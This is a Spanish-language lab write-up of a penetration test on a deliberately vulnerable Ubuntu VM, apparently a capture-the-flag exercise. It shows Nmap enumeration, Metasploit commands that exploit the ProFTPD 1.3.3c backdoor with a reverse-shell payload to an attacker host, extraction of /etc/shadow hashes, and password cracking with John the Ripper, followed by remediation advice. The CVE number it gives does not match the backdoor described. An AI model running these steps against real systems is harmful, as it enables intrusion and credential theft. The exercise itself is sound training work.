
Recorrido de prueba de penetración en una máquina virtual Ubuntu vulnerable. Explotó la puerta trasera de ProFTPD 1.3.3c (CVE-2010-4221) para obtener acceso root y capturar la bandera. Incluye enumeración con Nmap, configuración del payload de Metasploit y descifrado de hashes de usuarios (John the Ripper).
: ProFTPD 1.3.3c Backdoor Exploit (Flag de Root)
Este informe detalla la prueba de penetración realizada en una máquina virtual (VM) Linux vulnerable, centrándose en identificar una vulnerabilidad de servicio de alto riesgo que permitía obtener acceso root inmediato.
| Detalle | Valor |
|---|---|
| Dirección IP del Objetivo | [ 192.168.222.130] |
| Dirección IP del Atacante (LHOST) | [ 192.168.222.128] |
| SO del Objetivo | Ubuntu 4ubuntu2.2 (Linux Kernel 3.x) |
| Objetivo | Obtener una shell a nivel root y recuperar el archivo flag. |
El reconocimiento inicial implicó un escaneo de servicios con Nmap para identificar puertos abiertos y versiones de servicios.
Comando:
sudo nmap -sS -sV 192.168.222.130
Hallazgos Clave:
| Puerto | Servicio | Versión | Riesgo | | :--- | :--- | :--- | :---
| 21/tcp | ftp | ProFTPD 1.3.3c | CRÍTICO (Backdoor Explotable) |
| 22/tcp | ssh | OpenSSH 7.2p2 | Bajo (Servicio estándar) |
| 80/tcp | http | Apache httpd 2.4.18 | Bajo (No se encontró ninguna vulnerabilidad web obvia) |
Un escaneo posterior con scripts de vulnerabilidad confirmó la existencia de un backdoor de alta criticidad en el servicio FTP.
La salida del script de Nmap mostró explícitamente la ejecución de comandos como usuario root:
| ftp-proftpd-backdoor:
| Esta instalación tiene un backdoor.
| Command: id
|_ Results: uid=0(root) gid=0(root) groups=0(root)...
3. Explotación y Obtención de la Shell Root
Se utilizó el framework Metasploit para aprovechar el backdoor confirmado de ProFTPD.
Pasos de Explotación:
- Lanzar Metasploit: msfconsole
- Seleccionar el Módulo Exploit: use exploit/unix/ftp/proftpd_133c_backdoor
- Establecer Opciones:
Bash
set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128
Resultado: Se estableció correctamente una sesión de shell de comandos, otorgando privilegios root inmediatos (uid=0).
4. Post-Explotación y Recuperación de la Flag
Obtención de Credenciales
Los hashes de usuarios del sistema se extrajeron de /etc/shadow para su análisis post-explotación. El hash del usuario marlinspike fue roto exitosamente con John the Ripper.
Comando Utilizado (en la Máquina Atacante):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Credencial Descifrada:
Usuario: marlinspike
Contraseña: marlinspike
5. Recomendaciones de Remediación
La postura de seguridad del sistema es extremadamente débil debido al servicio FTP comprometido. Se deben tomar medidas inmediatas para asegurar el sistema:
- Parcheo/Actualización Inmediato: El servicio ProFTPD debe ser parcheado o actualizado inmediatamente a una versión segura (superior a 1.3.3g) para corregir el backdoor conocido y los CVE relacionados.
- Eliminación del Servicio: Si el FTP no es necesario para el funcionamiento del sistema, el servicio debe eliminarse por completo.
- Cortafuegos: Implementar reglas estrictas de cortafuegos (iptables/ufw) para bloquear el acceso externo al puerto 21.
- Configuraciones Seguras de SSH: Revisar las configuraciones de SSH para deshabilitar el inicio de sesión root y exigir autenticación basada en claves.
Ejecutar: exploit